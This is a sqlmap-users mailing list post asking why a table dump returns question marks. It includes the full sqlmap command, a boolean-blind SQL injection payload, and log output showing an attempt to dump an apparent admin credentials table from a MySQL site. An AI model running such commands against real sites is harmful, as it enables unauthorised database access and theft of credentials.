[sqlmap-users] Data retrieval problem - Question Marks

[Vinicius Da Loop]

log:

imac:sqlmap $ ./sqlmap.py -u "http://target/?ref=foobar"; --technique=B
--threads=10 --no-cast -T ilh_admin --dump

    sqlmap/1.0-dev-a639dbb - automatic SQL injection and database takeover
tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program

[*] starting at 13:22:41

[13:22:41] [INFO] resuming back-end DBMS 'mysql'
[13:22:41] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: ref
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ref=Manuellaerick' AND 8207=8207 AND 'GPWS'='GPWS
---
[13:22:41] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[13:22:41] [WARNING] missing database parameter. sqlmap is going to use the
current database to enumerate table(s) entries
[13:22:41] [INFO] fetching current database
[13:22:41] [INFO] retrieving the length of query output
[13:22:41] [INFO] resumed: 22

[sniped]

[13:22:44] [INFO] retrieving the length of query output
[13:22:44] [INFO] retrieved: 13
[13:22:54] [INFO] retrieved: ?????????????
[13:22:54] [INFO] retrieving the length of query output
[13:22:54] [INFO] retrieved: 1
[13:22:58] [INFO] retrieved: _
[13:23:00] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
[13:23:00] [INFO] retrieving the length of query output
[13:23:00] [INFO] retrieved: 10
[13:23:09] [INFO] retrieved: ??????????
[13:23:09] [INFO] analyzing table dump for possible password hashes
Database: hostl347
Table: ilh_admin
[1 entry]
+----+------------+---------------+
| id | pass       | admin         |
+----+------------+---------------+
|    | ?????????? | ????????????? |
+----+------------+---------------+

------------------------------------------------------------------------------
See everything from the browser to the database with AppDynamics
Get end-to-end visibility with application monitoring from AppDynamics
Isolate bottlenecks and diagnose root cause in seconds.
Start your free trial of AppDynamics Pro today!
http://pubads.g.doubleclick.net/gampad/clk?id=48808831&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users